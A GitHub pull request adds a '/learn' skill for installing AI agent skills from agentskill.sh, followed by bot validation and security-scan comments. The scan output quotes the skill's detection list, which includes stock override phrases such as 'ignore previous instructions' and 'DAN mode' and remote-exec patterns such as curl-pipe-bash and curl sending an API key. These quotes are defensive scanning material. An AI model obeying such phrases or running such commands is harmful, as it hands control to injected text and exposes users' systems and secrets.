Skip to content

Add /learn - cross-platform skill discovery with security scanning#12

Open
romainsimon wants to merge 2 commits intoblock:mainfrom
romainsimon:add-learn-skill
Open

Add /learn - cross-platform skill discovery with security scanning#12
romainsimon wants to merge 2 commits intoblock:mainfrom
romainsimon:add-learn-skill

Conversation

@romainsimon
Copy link

Summary

Adds /learn, a cross-platform skill discovery and installation tool powered by agentskill.sh.

What it does

  • Search 40,000+ skills across platforms (not just Goose)
  • Two-layer security: server-side scanning (12 threat categories) + client-side verification
  • Auto-rating feedback loop surfaces quality, flags bad actors
  • Works with Goose, Claude Code, Cursor, Codex, Windsurf, and 10+ more

Commands

Command Description
/learn seo Search by keyword
/learn @owner/name Install specific skill
/learn Project-based recommendations
/learn trending Popular skills
/learn scan <path> Security scan before install
/learn list Show installed skills
/learn update Check for updates

Why include this?

After ClawHub's malware incident (20% malicious skills), security-first discovery matters. This gives Goose users access to a pre-vetted, cross-platform skill ecosystem.

Security dashboard

@github-actions
Copy link

github-actions bot commented Feb 13, 2026

✅ Validate Skills — PASSED

Summary: FAIL=0 · WARN=0
Changed skill dirs: learn

Output (last 200 lines)

✅ Found 8 skill directories.
✅ api-setup: structure validated
✅ beads: structure validated
✅ code-review: structure validated
✅ frontend-design: structure validated
✅ goose-blog-post: structure validated
✅ learn: structure validated
✅ rp-why: structure validated
✅ testing-strategy: structure validated

Structure validation PASSED.

@github-actions
Copy link

github-actions bot commented Feb 13, 2026

🛡️ Skills Security Scan — FAIL

Summary: FAIL=5 · WARN=43 · FILES=2
Changed skills scanned: learn

FAIL blocks merge. Fix the items below.

❌ Failures

learn

  • prompt-injection:secrets-escalationlearn/SKILL.md:384
| CRITICAL | ×20 | Prompt injection, remote code execution, credential theft, reverse shells, destructive commands |

Guidance: Blocks prompt-injection language combined with secret-target keywords.

  • remote-exec:curl-pipe-shelllearn/references/SECURITY.md:178
| One-liner installers | `curl ... \| bash` with obfuscated payload |

Guidance: Blocks download-and-execute. Vendor scripts or verify pinned downloads + checksums.

  • remote-exec:curl-pipe-shelllearn/references/SECURITY.md:283
| `curl \| bash` patterns | Remote code execution |

Guidance: Blocks download-and-execute. Vendor scripts or verify pinned downloads + checksums.

  • remote-exec:curl-pipe-shelllearn/references/SECURITY.md:430
| `curl \| bash` | Remote code execution |

Guidance: Blocks download-and-execute. Vendor scripts or verify pinned downloads + checksums.

  • prompt-injection:secrets-escalationlearn/references/SECURITY.md:20
### Secret Scanners

Guidance: Blocks prompt-injection language combined with secret-target keywords.

⚠️ Warnings

learn

  • content:entropy-high-filelearn/SKILL.md:1
---
  • network:urllearn/SKILL.md:16
Discover, install, and manage AI agent skills from [agentskill.sh](https://agentskill.sh). This skill turns your agent into a self-improving system that can search for capabilities it lacks, install them mid-session, and provide feedback af…

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:45
1. Use WebFetch to call: `https://agentskill.sh/api/agent/search?q=<URL-encoded query>&limit=5`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:73
If no results are found, say: "No skills found for '<query>'. Try different keywords or browse at https://agentskill.sh"

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:82
2. Use WebFetch to call: `https://agentskill.sh/api/agent/skills/<slug>/install?owner=<owner>`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:84
4. If not found, say: "Skill @<owner>/<slug> not found. Check the name at https://agentskill.sh"

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:92
1. Parse the slug from the URL path (last segment of `https://agentskill.sh/<slug>`)

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:93
2. Use WebFetch to call: `https://agentskill.sh/api/agent/skills/<slug>/install`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:126
1. Use WebFetch to call: `https://agentskill.sh/api/agent/search?section=trending&limit=5`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:138
3. Use WebFetch to POST to `https://agentskill.sh/api/skills/<slug>/agent-feedback` with JSON body:

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:184
2. Collect all slugs and call the batch version endpoint: `https://agentskill.sh/api/agent/skills/version?slugs=<comma-separated slugs>`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:261
1. Fetch skill content from `https://agentskill.sh/api/agent/skills/<slug>/install?platform=<platform>` if not already fetched

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:330
   # source: https://agentskill.sh/<slug>

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:336
9. Track the install — use WebFetch to POST to `https://agentskill.sh/api/skills/<slug>/install` with JSON body:

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:424
After scanning, report any issues found to `POST https://agentskill.sh/api/agent/security-reports` with the scan results. This helps flag malicious skills and protect other users. Fire-and-forget; do not block on this call.

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:435
2. Use WebFetch to call: `https://agentskill.sh/api/agent/skills/learn/version`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:439
   a. Fetch the latest version from `https://agentskill.sh/api/agent/skills/learn/install`

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:642
| API unreachable / timeout | "Could not reach agentskill.sh. Check your connection or try again later. You can also browse skills at https://agentskill.sh" |

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:643
| No search results         | "No skills found for '<query>'. Try different keywords or browse at https://agentskill.sh"                                     |

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:644
| Skill not found (404)     | "Skill '<slug>' not found. It may have been removed. Browse available skills at https://agentskill.sh"                         |

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/SKILL.md:655
All endpoints are on `https://agentskill.sh`.

Guidance: Review: URL present; confirm expected destination and purpose.

  • content:entropy-high-linelearn/references/SECURITY.md:3
**Treat skill installation like installing software.** Only use skills from trusted sources — those you created yourself or obtained from verified authors. Skills provide Claude with new capabilities through instructions and code, and a mal…
  • content:entropy-high-filelearn/references/SECURITY.md:1
# Security Pattern Library
  • network:curl-wgetlearn/references/SECURITY.md:111
| curl/wget with variables | `curl -d "$API_KEY" https://...` |

Guidance: Review: network tool usage; ensure it's necessary and safe.

  • network:curl-wgetlearn/references/SECURITY.md:316
| `curl` output used in prompts | External data becomes instructions |

Guidance: Review: network tool usage; ensure it's necessary and safe.

  • network:curl-wgetlearn/references/SECURITY.md:431
| `wget && chmod +x` | Download and execute |

Guidance: Review: network tool usage; ensure it's necessary and safe.

  • network:urllearn/references/SECURITY.md:111
| curl/wget with variables | `curl -d "$API_KEY" https://...` |

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/references/SECURITY.md:466
| Unknown sources | `pip install git+https://...` |

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/references/SECURITY.md:467
| Editable installs from URL | `pip install -e https://...` |

Guidance: Review: URL present; confirm expected destination and purpose.

  • network:urllearn/references/SECURITY.md:544
POST https://agentskill.sh/api/agent/security-reports

Guidance: Review: URL present; confirm expected destination and purpose.

  • prompt-injection:jailbreaklearn/SKILL.md:549
4. **User can override anytime**: `/learn feedback <slug> <score> [comment]`

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/SKILL.md:576
### User Override

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/SKILL.md:578
If the user disagrees with your auto-rating, they can override it:

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/SKILL.md:582
The override will update the rating. Always respect user overrides.

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/SKILL.md:631
   *Override any rating: `/learn feedback <slug> <score> [comment]`*

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:ignore-instructionslearn/references/SECURITY.md:226
| "ignore previous instructions" | Direct override |

Guidance: Review: instruction-bypass language. Ensure skill cannot override safety/system rules.

  • prompt-injection:ignore-instructionslearn/references/SECURITY.md:557
      "description": "Contains 'ignore previous instructions'",

Guidance: Review: instruction-bypass language. Ensure skill cannot override safety/system rules.

  • prompt-injection:jailbreaklearn/references/SECURITY.md:222
**What to detect:** Attempts to override agent behavior.

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/references/SECURITY.md:227
| "ignore all prior" | Direct override |

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/references/SECURITY.md:228
| "disregard above" | Direct override |

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/references/SECURITY.md:229
| "DAN mode" | Jailbreak attempt |

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/references/SECURITY.md:230
| "jailbreak" | Jailbreak attempt |

Guidance: Review: jailbreak/system prompt language.

  • prompt-injection:jailbreaklearn/references/SECURITY.md:470
| Private registry override | Dependency confusion attacks |

Guidance: Review: jailbreak/system prompt language.


Notes: This comment auto-updates on each push to keep PRs clean.

@romainsimon
Copy link
Author

Fixed the issues flagged by the validator:

  1. Frontmatter format - Moved author and version to top level (was nested under metadata)

  2. Security scan false positives - The inline pattern examples (curl|bash, etc.) were being flagged as dangerous code. These are actually patterns TO DETECT, not code to execute. Moved the full pattern library to references/SECURITY.md and kept only a high-level summary in SKILL.md.

The skill now references the external file for detailed patterns rather than listing them inline.

romainsimon and others added 2 commits February 15, 2026 03:13
Search and install from 40,000+ skills with two-layer security:
- Server-side scanning (12 threat categories)
- Client-side verification before install
- Auto-rating feedback loop surfaces quality skills

Works with Goose, Claude Code, Cursor, Codex, Windsurf, and 10+ more.

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
Signed-off-by: Romain SIMON <contact@romainsimon.net>
- Move inline dangerous patterns to references/SECURITY.md
- Keep high-level threat categories and scoring in SKILL.md
- Patterns are now referenced, not inline (avoids false positives)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
Signed-off-by: Romain SIMON <contact@romainsimon.net>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant

Comments